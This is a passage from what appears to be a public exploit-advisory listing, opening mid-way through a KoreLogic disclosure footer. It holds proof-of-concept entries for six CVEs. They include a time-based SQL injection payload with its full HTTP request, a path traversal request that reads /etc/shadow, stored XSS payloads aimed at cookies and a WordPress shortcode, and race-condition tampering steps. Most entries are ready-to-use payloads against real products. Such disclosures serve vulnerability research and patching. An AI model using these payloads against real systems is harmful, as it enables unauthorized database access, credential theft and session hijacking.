copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code># Exploit Title: Customer Support System 1.0 - Multiple SQL injection<br />vulnerabilities<br /># Date: 15/12/2023<br /># Exploit Author: Geraldo Alcantara<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html<br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code<br /># Version: 1.0<br /># Tested on: Windows<br /># CVE : CVE-2023-50071<br />*Description*: Multiple SQL injection vulnerabilities in<br />/customer_support/ajax.php?action=save_ticket in Customer Support<br />System 1.0 allow authenticated attackers to execute arbitrary SQL<br />commands via department_id, customer_id and subject.*Payload*:<br />'+(select*from(select(sleep(20)))a)+'<br />*Steps to reproduce*:<br /><br />1- Log in to the application.<br /><br />2- Navigate to the page /customer_support/index.php?page=new_ticket.<br /><br />3- Create a new ticket and insert a malicious payload into one of the<br />following parameters: department_id, customer_id, or subject.<br />*Request:*<br />POST /customer_support/ajax.php?action=save_ticket HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)<br />Gecko/20100101 Firefox/120.0<br />Accept: */*<br />Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------81419250823331111993422505835<br />Content-Length: 853<br />Origin: http://192.168.68.148<br />Connection: close<br />Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket<br />Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;<br />sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;<br />PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l<br /><br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="subject"<br /><br />teste'+(select*from(select(sleep(5)))a)+'<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="customer_id"<br /><br />3<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="department_id"<br /><br />4<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="description"<br /><br /><p>Blahs<br></p><br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------81419250823331111993422505835--<br /><br /></code></pre>
<pre><code># Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63<br /># Date: 3/2024<br /># CVE: CVE-2019-6268<br /># Exploit Author: Branko Milicevic<br /><br />RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.<br /><br />Steps to reproduce:<br /><br />Request:<br />GET /../../../../../../../../../../etc/shadow HTTP/1.1<br /><br />Response:<br />HTTP/1.1 200 OK<br /><br />root:nDnjJ****ydh3:11851:0:99999:7:::<br />bin:*:11851:0:99999:7:::<br />daemon:*:11851:0:99999:7:::<br />adm:*:11851:0:99999:7:::<br />lp:*:11851:0:99999:7:::<br />sync:*:11851:0:99999:7:::<br />shutdown:*:11851:0:99999:7:::<br />Vulnerability Type<br />Directory Traversal<br /><br />Attack Vectors<br />Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).<br /><br />Reference<br />https://www.owasp.org/index.php/Path_Traversal<br /></code></pre>
<pre><code># Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel<br /># Date: 10-30-23<br /># Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security<br /># Vendor Homepage: https://www.solar-log.com/en/<br /># Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019<br /># Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/<br /># CVE: CVE-2023-46344<br /><br /># POC:<br /><br />1. Go to solar panel<br />2. Go to configuration -> Smart Energy -> "drag & drop" button.<br />3. Change "name" to: <xss onmouseenter="alert(document.cookie)"<br />style=display:block>test</xss><br />4. Once you hover over "test", you get XSS -> if a higher privileged<br />user hovers over it, we can get their cookies.<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)<br /># Date: 2023-11-15<br /># Exploit Author: Eren Car<br /># Vendor Homepage: https://www.eralion.com/<br /># Software Link: https://downloads.wordpress.org/plugin/neon-text.zip<br /># Category: Web Application<br /># Version: 1.0<br /># Tested on: Debian / WordPress 6.4.1<br /># CVE : CVE-2023-5817<br /><br /># 1. Description:<br />The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. <br /> <br /># 2. Proof of Concept (PoC):<br /> a. Install and activate version 1.0 of the plugin.<br /> b. Go to the posts page and create new post.<br /> c. Add shorcode block and insert the following payload:<br /> <br /> [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]<br /> <br /> <br /> d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via Race<br />Condition<br /># Google Dork: inurl:/wp-content/plugins/kk-star-ratings/<br /># Date: 2023-11-06<br /># Exploit Author: Mohammad Reza Omrani<br /># Vendor Homepage: https://github.com/kamalkhan<br /># Software Link: https://wordpress.org/plugins/kk-star-ratings/<br /># WPScan :<br />https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/<br /># Version: 5.4.6<br /># Tested on: Wordpress 6.2.2<br /># CVE : CVE-2023-4642<br /><br /># POC:<br />1- Install and activate kk Star Ratings.<br />2- Go to the page that displays the star rating.<br />3- Using Burp and the Turbo Intruder extension, intercept the rating<br />submission.<br />4- Send the request to Turbo Intruder using Action > Extensions > Turbo<br />Intruder > Send to turbo intruder.<br />5- Drop the initial request and turn Intercept off.<br />6- In the Turbo Intruder window, add "%s" to the end of the connection<br />header (e.g. "Connection: close %s").<br />7- Use the code `examples/race.py`.<br />8- Click "Attack" at the bottom of the window. This will send multiple<br />requests to the server at the same moment.<br />9- To see the updated total rates, reload the page you tested.<br /><br /></code></pre>
<pre><code>[+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC<br />[+] twitter.com/_striv3r_<br /><br />[Vendor]<br />Tp-Link (http://tp-link.com)<br /><br /><br />[Product]<br />JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201<br /><br /><br />[Vulnerability Type]<br />Improper Access Control<br /><br /><br />[Affected Product Code Base]<br />JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201<br /><br /><br />[Affected Component]<br />usermanagement, swtmactablecfg endpoints of webconsole<br /><br /><br />[CVE Reference]<br />CVE-2023-43318<br /><br /><br />[Security Issue]<br />TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows<br />attackers to escalate privileges via modification of the 'tid' and 'usrlvl'<br />values in GET requests.<br /><br /><br />[Exploit/POC]<br />N/A<br /><br /><br />[Network Access]<br />Remote<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: September 12, 2023<br />Vendor released fixed firmware TL-SG2210P(UN)_V5.20_5.20.1 Build 20240202:<br />February 29, 2024<br />March 1, 2024 : Public Disclosure<br /><br /></code></pre>